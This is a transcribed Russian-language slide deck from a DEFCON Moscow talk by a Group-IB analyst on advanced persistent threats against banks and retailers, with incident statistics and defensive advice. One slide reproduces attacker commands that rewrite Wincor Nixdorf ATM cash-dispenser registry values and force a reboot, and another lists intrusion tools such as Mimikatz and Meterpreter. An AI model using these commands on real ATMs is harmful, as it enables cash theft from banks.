defcon moscow #0x0a - nikita kislitsin apt "advanced persistent threats"
Post on 13-Apr-2017
1.558 Views
Preview:
TRANSCRIPT
Никита Кислицин,Group-IB
2
Происходят плохие вещи
— Взломали платежную систему, украли прибыль за 3 года
— Взломали банк, продали доллары по 55, через 17 минут купили по 65
— Взломали банк, получили доступ к сети с банкоматами, вынули наличных на 20 млн. руб.
— Взломали сеть POS-терминалов торговой сети, украли 70 млн. карт
— Взломали крупный интернет-сервис, слили базу и исходники
3
1. Заражение хостов в инфраструктуре
— Социальная инженерия, вредоносные вложения* CVE-2012-2539, CVE-2012-0158, CVE-2015-5119, etc.* Очень-важный-договор.scr* Реквизиты.doc.cpl
— Drive-By-Download* Niterix, Spartanб Angler, SunDown, etc.* Форумы и «Прогружу ваш софт»
4
2. Понимание того, куда попали боты
#!/usr/bin/pythonimport osfrom bulkwhois.shadowserver import BulkWhoisShadowserveriplist_file = ‘ip.txt’path = os.path.dirname(os.path.abspath(__file__))bulk_whois = BulkWhoisShadowserver()iplist = []with open(os.path.join(path, iplist_file)) as f: for line in f: iplist.append(line.strip()) result = bulk_whois.lookup_ips(iplist)
5
3. Поднятие привилегий и доступ к нужным хостам/приложениям
- Mimikatz- Caen& Abel- Linux/Ssemgrvd sshd Backdoor- RDPDoor, Poison Ivy- Amyy Admin, Team Viewer- Meterpreter- SoftPerfect, etc.
6
4. Вывод денег
REG ADD “HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER”/v VALUE_1 /t REG_SZ/d “5000” /fREG ADD “HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER”/v VALUE_2 /t REG_SZ/d “1000” /fREG ADD “HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER”/v VALUE_3 /t REG_SZ
/d “500” /fREG ADD “HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER”/v VALUE_4 /t REG_SZ/d “100” /fREG ADD “HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER”/v VALUE_1 /t REG_SZ/d “100” /fREG ADD “HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER”/v VALUE_4 /t REG_SZ/d “5000” /fshutdown -r -t 0 –f
7
8
ANUNAK• 200 ботов• 1 млрд рублей хищений
CORKOW• 400.000 ботов• Сумма балансов ботов:
> 6500 млн. рублей• Направленные атаки на
банковский сектор
15
16
t d s . g r o u p - i b . r u
86%компьютеров в ботнетах имеют установленное антивирусное средство
1.5Mкомпьютеров в Россиизаразил ботнет Carberp
Использование антивирусов на зараженных компьютерах
8%14%
16%
7%44%
11%
Нет антивируса KasperskyMicrosoftSymantec
Dr WebДругие
17
20
• 1,789/127 магазиновв США/Канаде
• 127/37 складовв США/Канаде
• 361,000 сотрудников• Target.com
21
22
23
24
25
26
27
28
29
Brian DyeSymantec Senior VP: «Antivirusis dead»** WSJ, MAY-14
Выявление всех актуальных угроз, включая мобильные
Выгодный аутсорс анализа сетевых инцидентовв CERT-GIB
Ежедневные обновления правил и сигнатур
Анализ полосы до 5 Гбит/сек компактным1U-решением
Выявление всех актуальных угроз, включая мобильные
Выгодный аутсорс анализа сетевых инцидентовв CERT-GIB
Ежедневные обновления правил и сигнатур
Анализ полосы до 5 Гбит/сек компактным1U-решением
Выявление всех актуальных угроз, включая мобильные
Выгодный аутсорс анализа сетевых инцидентовв CERT-GIB
Ежедневные обновления правил и сигнатур
Анализ полосы до 5 Гбит/сек компактным1U-решением
Выявление всех актуальных угроз, включая мобильные
Выгодный аутсорс анализа сетевых инцидентовв CERT-GIB
Ежедневные обновления правил и сигнатур
Анализ полосы до 5 Гбит/сек компактным1U-решением
Выявление всех актуальных угроз, включая мобильные
Выгодный аутсорс анализа сетевых инцидентовв CERT-GIB
Ежедневные обновления правил и сигнатур
Анализ полосы до 5 Гбит/сек компактным1U-решением
Выявление всех актуальных угроз, включая мобильные
Выгодный аутсорс анализа сетевых инцидентовв CERT-GIB
Ежедневные обновления правил и сигнатур
Анализ полосы до 5 Гбит/сек компактным1U-решением
36
ИБ-вендоры предлагают купить новое(теперь-то действенное!) решение проблемы
— Мой super advanced anti-APT лучше твоего, у меня песочница и классификатор на тыщу фич
— Твоя песочница уже не торт, мы используем чистую математику и чистую магию: детектируем все, не анализируя ничего
37
38
Что надо было делать до инцидентов
— В организации процессов исходить из того, что компьютер(ы) в сети уже заражены
— Хорошо и глубоко писать логи по соединениям (netflow, http-log, passivedns)
— Объективно изучать пользовательский трафик, вместо того чтобы ставить очередное хостовое решение
— Довериться вендорам, которые знают и постоянно изучают реальные угрозы в вашем регионе
Никита Кислицин,Group-IB
top related